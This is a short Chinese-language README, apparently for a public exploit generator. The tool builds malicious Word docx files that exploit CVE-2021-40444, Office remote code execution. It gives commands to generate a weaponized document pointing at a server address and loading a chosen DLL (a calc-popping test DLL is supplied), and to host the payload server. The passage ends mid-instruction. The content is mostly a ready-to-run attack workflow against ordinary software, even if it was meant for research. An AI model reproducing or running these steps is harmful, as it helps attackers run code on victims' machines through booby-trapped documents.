恶意 docx 生成器,用于利用 CVE-2021-40444(Microsoft Office Word 远程代码执行)
此脚本的创建基于对样本(938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52,docx 文件)的一些逆向工程。
你需要先安装 lcab(sudo apt-get install lcab)
查看 REPRODUCE.md 了解手动复现步骤
如果你的生成的 cab 文件不起作用,请尝试将 exploit.html 的 URL 指向 calc.cab
首先,针对一个 DLL 生成一个恶意 docx 文档。你可以使用 test/calc.dll,它通过调用 system() 弹出 calc.exe。
python3 exploit.py generate test/calc.dll http://<SRV IP>

生成恶意 docx(位于 out/)后,你可以设置服务器:
sudo python3 exploit.py host 80

最后在 Windows 虚拟机中尝试该 docx:
